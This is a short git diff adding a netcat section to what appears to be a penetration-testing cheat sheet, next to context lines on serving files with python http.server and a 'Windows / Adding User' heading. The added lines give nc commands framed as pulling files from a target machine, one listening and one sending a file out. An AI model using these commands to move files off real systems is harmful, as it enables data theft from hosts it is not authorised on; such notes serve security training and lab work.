diff --git a/Cheat Sheet.md b/Cheat Sheet.md
index 059d064..5351f9e 100644
--- a/Cheat Sheet.md
+++ b/Cheat Sheet.md
@@ -48,6 +48,11 @@ python3 -m http.server [port] `By default will listen on 8000`
wget http://:port/
+### Netcat to download files from target
+
+`nc -l -p [port] > file` Receive file
+`nc -w 3 [ip] [port] < file `Send file
+
# Windows
### Adding User